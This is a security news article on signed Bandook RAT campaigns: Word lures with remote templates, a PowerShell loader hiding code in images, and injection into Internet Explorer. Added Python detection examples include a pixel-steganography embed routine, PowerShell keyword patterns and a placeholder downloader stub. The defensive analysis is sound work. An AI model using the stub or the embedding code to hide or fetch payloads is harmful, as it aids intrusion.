Thursday, March 28, 2024

Signed Bandook Malware Attacks Against Multiple Industrial Sectors

Like a phoenix rising from the ashes, Bandook has returned after several years. Bandook, written in both Delphi and C++, was first seen in 2007 as a commercially available RAT developed by a Lebanese individual using the handle PrinceAli.

Over the years, variants of Bandook were leaked on the Web, and the malware became available for public download.

Bandook was last featured in the campaigns Operation Manul (2015) and Dark Caracal (2017). During the past year, dozens of digitally signed variants of the once-famous Bandook began to reappear in the threat landscape.

Government, financial, energy, food industry, healthcare, education, IT and legal institutions are the targeted sectors.

Singapore, Cyprus, Chile, Italy, the USA, Turkey, Switzerland, Indonesia and Germany: not a list of holiday destinations, but the targeted countries.

Given the wide array of sectors and countries targeted, the malware is suspected not to be operated by a single entity but to be part of an offensive infrastructure that is sold to governments and threat actors worldwide.

Stages of Infection

The infection chain can be described in three stages, as shown in the picture below:

Infection Chain

Stage 1 – Lure Documents

The lure Microsoft Word document consists of encrypted malicious script data and an external template reference that points to a document containing malicious VBA macros.

The external template is downloaded via a URL-shortening web service that redirects to an attacker-controlled domain. Once the template loads, its VBA code runs automatically, decrypts the data embedded in the original lure document, and drops the decoded data into two files in the local user folder: fmx.ps1 and sdmc.jpg.

Sample document file names:

  • Malaysia Shipment.docx
  • Jakarta Shipment.docx
  • malta containers.docx
  • Certified documents.docx
  • Notarized Documents.docx
  • bank statement.docx
  • passport and documents.docx
  • Case Draft.docx
  • documents scan.docx
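Note that every lure above is a plain .docx: the macros live in the remote template, so scanning the lure for a VBA project alone misses it. The indicator that is present in the file is the external attachedTemplate relationship. The following is an added example, not code from the original article or from the researchers who analysed Bandook, showing how to pull that relationship out of a .docx and flag a shortener-hosted target. The in-memory document it builds, the placeholder URL and the shortener list are all constructed for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# OOXML relationship types involved in remote template injection.
PKG_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
TEMPLATE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/attachedTemplate")
# Non-exhaustive list of public URL shorteners; extend it for your environment.
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "is.gd", "cutt.ly", "rb.gy"}


def build_constructed_docx(template_url=None, with_vba=False):
    """Build a minimal .docx in memory for the example. The URL passed in is a
    placeholder chosen by the caller, not an indicator from the campaign."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/settings.xml", "<w:settings/>")
        if with_vba:
            z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # OLE magic only
        if template_url is not None:
            z.writestr(
                "word/_rels/settings.xml.rels",
                '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                f'<Relationship Id="rId1" Type="{TEMPLATE_REL}" '
                f'Target="{template_url}" TargetMode="External"/>'
                "</Relationships>",
            )
    return buf.getvalue()


def inspect_docx(data):
    """Return template-injection indicators for a .docx blob: external
    attachedTemplate targets, whether any target host is a URL shortener,
    and whether the file itself carries a VBA project."""
    findings = {"external_templates": [], "uses_shortener": False, "has_vba": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        findings["has_vba"] = "word/vbaProject.bin" in names
        for name in names:
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(PKG_NS + "Relationship"):
                if (rel.get("TargetMode") == "External"
                        and rel.get("Type") == TEMPLATE_REL):
                    findings["external_templates"].append(rel.get("Target"))
    hosts = {(urlparse(u).hostname or "").lower() for u in findings["external_templates"]}
    findings["uses_shortener"] = bool(hosts & SHORTENERS)
    return findings


def verdict(findings):
    """Triage label: a macro-free .docx that pulls its template through a
    shortener has the shape of the Stage 1 lure described above."""
    if findings["external_templates"] and findings["uses_shortener"]:
        return "suspicious: remote template via URL shortener"
    if findings["external_templates"]:
        return "review: remote template"
    return "no remote template"


if __name__ == "__main__":
    sample = build_constructed_docx("https://bit.ly/placeholder")  # constructed lure
    found = inspect_docx(sample)
    print(found, verdict(found))
```

The same relationship type can legitimately point at a corporate template server, so the shortener check (and an allowlist of your own template hosts) is what separates a finding worth opening a ticket for from noise.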

Stage 2 – PowerShell Loader

After the first stage has dropped fmx.ps1 and sdmc.jpg, the VBA code calls fmx.ps1, a short PowerShell script that decodes and executes a base64-encoded PowerShell script stored inside sdmc.jpg.

The decoded PowerShell script then downloads a zip file containing four files from a cloud service such as Dropbox, Bitbucket or an S3 bucket. The zip file is stored in the user’s Public folder, and the four files are extracted locally.

Three of the files, a.png, b.png and untitled.png, are used to generate the malware payload. untitled.png is a valid image that hides an RC4 function encoded in the RGB values of its pixels, created with the known tool Invoke-PSImage.

Finally, the PowerShell script executes the malware, opens draft.docx, and deletes all previous artifacts from the Public folder.

draft.docx is a benign decoy document that tells the victim the document is no longer available, so that nothing appears amiss while the payload is already running.

The document as seen post infection:
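Two tricks in this stage hide code inside image files: sdmc.jpg carries a base64 blob that fmx.ps1 decodes and runs, and untitled.png carries a routine in its pixel values. The block below is an added example, not code from the article or from the Bandook analysis, showing both in Python. The pixel layout (one byte per pixel, high nibble in the low four bits of blue, low nibble in the low four bits of green) is the scheme this example assumes for Invoke-PSImage and should be checked against the tool before relying on it; the JPEG bytes, the downloader stub and its URL are constructed for the example.

```python
import base64
import binascii
import re

# Pixel layout assumed here (the Invoke-PSImage scheme as this example understands it):
# one payload byte per pixel, high nibble in the low 4 bits of the blue channel,
# low nibble in the low 4 bits of the green channel. Red is untouched.

def embed_in_pixels(pixels, payload):
    """Hide payload bytes in a list of (r, g, b) tuples; returns a new pixel list."""
    if len(payload) > len(pixels):
        raise ValueError("image too small for payload")
    out = list(pixels)
    for i, byte in enumerate(payload):
        r, g, b = pixels[i]
        out[i] = (r, (g & 0xF0) | (byte & 0x0F), (b & 0xF0) | (byte >> 4))
    return out

def extract_from_pixels(pixels, length):
    """Recover `length` bytes from the low nibbles of the blue and green channels."""
    return bytes(((b & 0x0F) << 4) | (g & 0x0F) for _, g, b in pixels[:length])

# Keywords that, after decoding, mark a blob as PowerShell rather than image data.
PS_MARKERS = (b"invoke-expression", b"downloadfile", b"downloadstring",
              b"new-object", b"frombase64string", b"invoke-webrequest")
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")

def find_base64_powershell(blob):
    """Scan any file for long base64 runs that decode to PowerShell-looking text.
    Returns a list of (offset, decoded_bytes)."""
    hits = []
    for m in B64_RUN.finditer(blob):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        # Plain ASCII and UTF-16LE (-EncodedCommand style) both collapse to the same markers.
        for text in (decoded, decoded.replace(b"\x00", b"")):
            if any(k in text.lower() for k in PS_MARKERS):
                hits.append((m.start(), text))
                break
    return hits

# Constructed sample: JPEG header bytes, filler, then a base64-encoded downloader
# stub with a placeholder URL. This is not the real sdmc.jpg.
FAKE_SCRIPT = (b"$u='https://example.invalid/p.zip';"
               b"$w=New-Object Net.WebClient;"
               b"$w.DownloadFile($u,\"$env:PUBLIC\\p.zip\")")
FAKE_JPG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
            + base64.b64encode(FAKE_SCRIPT) + b"\xff\xd9")

if __name__ == "__main__":
    for off, text in find_base64_powershell(FAKE_JPG):
        print(off, text[:60])
    cover = [(200, 120, 40)] * 64              # constructed flat image
    msg = b"Invoke-Expression (Get-Content hidden.txt)"
    stego = embed_in_pixels(cover, msg)
    print(extract_from_pixels(stego, len(msg)))
```

Because only the low nibble of two channels changes, the carrier still renders as a valid, visually unchanged image, which is why a file-type check on untitled.png passes; the base64 scanner, by contrast, catches the sdmc.jpg trick because the decoded text is ordinary PowerShell.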

Stage 3 – Bandook Loader

The final payload is a variant of Bandook that starts with a loader, which creates a new Internet Explorer process and injects a malicious payload into it. The payload contacts the C&C server, sends basic information about the infected machine, and waits for additional commands from the server. It was also found that valid Certum certificates were used to sign the Bandook executable.
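Seen from the endpoint, the whole chain is a short process tree: an Office process spawning PowerShell, PowerShell starting a binary out of the Public folder, and that binary spawning iexplore.exe as an injection host. A valid Certum signature on the loader does not change any of those relationships, so detection should key on the tree and only report the signature. The following is an added example, not the article's or any vendor's detection content, that applies those rules to constructed Sysmon-style process-creation events; the PIDs, paths and the loader name loader.exe are placeholders, and the allowlist of normal iexplore.exe parents is an assumption to tune.

```python
import os

# Constructed process-creation events in the shape of Sysmon Event ID 1 (trimmed).
# PIDs, paths and the loader name "loader.exe" are placeholders, not campaign indicators.
EVENTS = [
    {"pid": 800, "ppid": 1, "image": r"C:\Windows\explorer.exe", "signed": True},
    {"pid": 4001, "ppid": 800,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "signed": True},
    {"pid": 4052, "ppid": 4001,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "signed": True},
    {"pid": 4100, "ppid": 4052, "image": r"C:\Users\Public\loader.exe", "signed": True},
    {"pid": 4120, "ppid": 4100,
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe", "signed": True},
    {"pid": 5000, "ppid": 800,
     "image": r"C:\Program Files\Internet Explorer\iexplore.exe", "signed": True},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
IE_PARENTS_OK = {"explorer.exe", "iexplore.exe"}  # assumption: tune to your estate

def _base(path):
    return os.path.basename(path.replace("\\", "/")).lower()

def ancestors(by_pid, pid):
    """Image basenames of the parent, grandparent, ... of `pid`, nearest first."""
    chain, seen, cur = [], set(), by_pid.get(pid)
    while cur is not None and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid.get(cur["ppid"])
        if cur is not None:
            chain.append(_base(cur["image"]))
    return chain

def detect(events):
    """Flag the three links of the chain: Office -> PowerShell, PowerShell -> binary
    in Users\\Public, and an iexplore.exe whose parent is not a normal launcher while
    a script host or Office app sits in its ancestry. Signature status is reported,
    never used to suppress an alert."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name, anc = _base(e["image"]), ancestors(by_pid, e["pid"])
        parent = anc[0] if anc else None
        reasons = []
        if name in SHELLS and OFFICE & set(anc):
            reasons.append("PowerShell descended from an Office process")
        if "/users/public/" in e["image"].replace("\\", "/").lower() and parent in SHELLS:
            reasons.append("executable in Users\\Public started by PowerShell")
        if (name == "iexplore.exe" and parent not in IE_PARENTS_OK
                and (SHELLS | OFFICE) & set(anc)):
            reasons.append(f"iexplore.exe started by {parent} under script/Office ancestry")
        if reasons:
            alerts.append({"pid": e["pid"], "image": name,
                           "signed": e["signed"], "reasons": reasons})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The user-launched iexplore.exe (pid 5000, parent explorer.exe) stays silent, while all three flagged processes carry a valid signature and are still reported, which is the point: signing buys the operator evasion from signature-trusting controls, not from behavioural ones.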

There are three variants currently in circulation:

  1. A full-fledged version with 120 commands (unsigned)
  2. A full-fledged version (single sample) with 120 commands (signed)
  3. A slimmed-down version with 11 commands (signed)

The slimmed-down, signed build indicates the operators’ desire to reduce the malware’s footprint and minimise the chance of detection in campaigns against high-profile targets, whereas the unsigned 120-command version can be used against lower-profile targets.

All evidence points to the conclusion that the operators behind the malicious infrastructure of Operation Manul and Dark Caracal are still alive and operational, willing to assist in offensive cyber operations for anyone who is willing to pay. Defenders should aim to stop the chain at its earliest stages, before the external template is fetched and the PowerShell loader runs.

Author: Gurubaran (https://gbhackers.com). Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.
